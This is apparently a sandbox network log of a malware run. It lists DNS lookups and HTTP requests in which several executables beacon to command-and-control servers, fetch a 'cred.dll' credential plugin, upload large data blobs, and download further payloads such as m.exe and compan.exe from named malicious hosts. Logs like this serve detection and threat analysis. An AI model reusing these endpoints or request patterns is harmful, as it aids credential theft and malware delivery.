                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.195.177
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.92.163
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        IN A
                                                                                                                                                                                        8.8.4.4
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        IN A
                                                                                                                                                                                        8.8.8.8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        r3.o.lencr.org
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        r3.o.lencr.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        r3.o.lencr.org
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        o.lencr.edgesuite.net
                                                                                                                                                                                        o.lencr.edgesuite.net
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        a1887.dscq.akamai.net
                                                                                                                                                                                        a1887.dscq.akamai.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        95.100.96.171
                                                                                                                                                                                        a1887.dscq.akamai.net
                                                                                                                                                                                        IN A
                                                                                                                                                                                        95.100.96.192
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 325
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:12 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php HTTP/1.1
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 84
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:12 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 6
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/plugins/cred.dll
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /t5BnOoke2/plugins/cred.dll HTTP/1.1
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /t5BnOoke2/index.php?scr=1 HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----c59ae46c679c8e8e8dfdc07336b93d55
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                        Content-Length: 79231
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:12 GMT
                                                                                                                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/plugins/cred.dll
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.215.113.55:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /t5BnOoke2/plugins/cred.dll HTTP/1.1
                                                                                                                                                                                        Host: 185.215.113.55
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:12 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ac4e310000bf558bbd9000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zo7j9AbLdSuTR0JFNfQyF3Zmx%2BGUPpgVYXNT%2ByshWq5skEpjXWJi8rn0jRrZ4PKXOspwKVB0vJKBXIWfGlCTK3LGSGHiNehiJFPYVubJrOZIhZ8E8%2FiD9ZlJXL5gEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686165d1c60bf55-AMS
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://cdn.discordapp.com/attachments/855697945679888404/859836642079932456/file1.bmp
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        162.159.135.233:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /attachments/855697945679888404/859836642079932456/file1.bmp HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:17 GMT
                                                                                                                                                                                        Content-Type: image/x-ms-bmp
                                                                                                                                                                                        Content-Length: 644608
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Ray: 66861677ad9dfa2c-AMS
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Age: 138683
                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                        Content-Disposition: attachment;%20filename=file1.bmp
                                                                                                                                                                                        ETag: "eab594642659c90ead038e6efbfe76c5"
                                                                                                                                                                                        Expires: Sat, 02 Jul 2022 07:16:17 GMT
                                                                                                                                                                                        Last-Modified: Wed, 30 Jun 2021 16:43:50 GMT
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                        Alt-Svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        x-goog-generation: 1625071430522842
                                                                                                                                                                                        x-goog-hash: crc32c=//g7bw==
                                                                                                                                                                                        x-goog-hash: md5=6rWUZCZZyQ6tA45u+/52xQ==
                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                        x-goog-stored-content-length: 644608
                                                                                                                                                                                        X-GUploader-UploadID: ADPycdsyfOKG9q4flWRacLRVbWPBvpndh5EuJFXsNPF1iGjCTcrXW7TcYDolSMBE5hk08qwpnj1ZvExFSyuZRv6baSIiuzA5Ug
                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6gcH7%2BRtOfFdkfU8J5bIjypjJAoCKi5ci%2FVeEO%2BcaCQrOkrjdneQoEppPzrp8AWEmvlLsdMqOhpKOO%2BjA4UYJVz5cR7ySFinZgGHQjJ4y1%2F3V%2BkE6IL%2F631bNkc9ZYU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        a.nel.cloudflare.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        a.nel.cloudflare.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        a.nel.cloudflare.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        35.190.80.1
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        clients2.googleusercontent.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        clients2.googleusercontent.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        clients2.googleusercontent.com
                                                                                                                                                                                        IN CNAME
                                                                                                                                                                                        googlehosted.l.googleusercontent.com
                                                                                                                                                                                        googlehosted.l.googleusercontent.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.250.179.161
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 309
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:18 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        ssl.gstatic.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        ssl.gstatic.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        ssl.gstatic.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        142.251.36.3
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        g-partners.top
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        g-partners.top
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        g-partners.top
                                                                                                                                                                                        IN A
                                                                                                                                                                                        159.65.63.164
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://g-partners.top/decision.php?pub=mixinte
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        159.65.63.164:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /decision.php?pub=mixinte HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Uvok-6Yh5-3moO-pCUX
                                                                                                                                                                                        Host: g-partners.top
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:19 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.16.168.131
                                                                                                                                                                                        hcaptcha.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.16.169.131
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        usa01.info
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        usa01.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        usa01.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        176.99.131.168
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://usa01.info/users/content/id03084901/mmow.txt
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        176.99.131.168:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /users/content/id03084901/mmow.txt HTTP/1.1
                                                                                                                                                                                        User-Agent: Installed OK 1.0/3
                                                                                                                                                                                        Host: usa01.info
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                        Server: nginx/1.14.2
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:20 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                        Content-Length: 260
                                                                                                                                                                                        Location: http://usa01.info/function/v2tmp/momomoomomom.php
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://usa01.info/function/v2tmp/momomoomomom.php
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        176.99.131.168:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /function/v2tmp/momomoomomom.php HTTP/1.1
                                                                                                                                                                                        User-Agent: Installed OK 1.0/3
                                                                                                                                                                                        Host: usa01.info
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.14.2
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:20 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 368640
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Content-Disposition: attachment; filename=m.exe
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://usa01.info/books/userpaths/birbik/harrypotter3.txt
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        176.99.131.168:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /books/userpaths/birbik/harrypotter3.txt HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; adscanner/)
                                                                                                                                                                                        Host: usa01.info
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 301 Moved Permanently
                                                                                                                                                                                        Server: nginx/1.14.2
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:41 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                        Content-Length: 256
                                                                                                                                                                                        Location: http://usa01.info/app/files/ap/id27315003.php
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://usa01.info/app/files/ap/id27315003.php
                                                                                                                                                                                        f63HbxfV2WYcYU58wgLyTehf.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        176.99.131.168:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /app/files/ap/id27315003.php HTTP/1.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (compatible; adscanner/)
                                                                                                                                                                                        Host: usa01.info
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx/1.14.2
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:42 GMT
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Content-Length: 366592
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Content-Disposition: attachment; filename=compan.exe
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 145
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://g-partners.top/stats/remember.php?pub=mixinte&user=Admin
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        159.65.63.164:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /stats/remember.php?pub=mixinte&user=Admin HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Uvok-6Yh5-3moO-pCUX
                                                                                                                                                                                        Host: g-partners.top
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:20 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        220.125.1.129:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /upload/ HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Referer: http://lahuertasonora.com/upload/
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                        Content-Length: 225
                                                                                                                                                                                        Host: lahuertasonora.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.0 404 Not Found
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:25 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                                                                                                                                                        X-Powered-By: PHP/5.6.40
                                                                                                                                                                                        Content-Length: 334
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        rdanoriran.xyz
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        rdanoriran.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        rdanoriran.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        185.183.98.8
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.183.98.8:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: rdanoriran.xyz
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:26 GMT
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Keep-Alive: timeout=3
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Content-Encoding: gzip
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://rdanoriran.xyz/
                                                                                                                                                                                        rwI3a3wTWh88dBrQa1ud4qdg.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        185.183.98.8:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/VerifyScanRequest"
                                                                                                                                                                                        Host: rdanoriran.xyz
                                                                                                                                                                                        Content-Length: 1869023
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://g-partners.top/dlc/distribution.php?pub=mixinte
                                                                                                                                                                                        2aNJWnHICffmGqno89GuHbVV.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        159.65.63.164:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /dlc/distribution.php?pub=mixinte HTTP/1.1
                                                                                                                                                                                        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                                                                                                                                        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                                                                                                                                        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                                                                                                                                        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                                                                                                                                        User-Agent: Uvok-6Yh5-3moO-pCUX
                                                                                                                                                                                        Host: g-partners.top
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:16:26 GMT
                                                                                                                                                                                        Server: Apache/2.4.6 (CentOS) mpm-itk/2.4.7-04 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                        X-Powered-By: PHP/5.4.16
                                                                                                                                                                                        Content-Description: File Transfer
                                                                                                                                                                                        Content-Disposition: attachment; filename=null
                                                                                                                                                                                        Content-Transfer-Encoding: binary
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
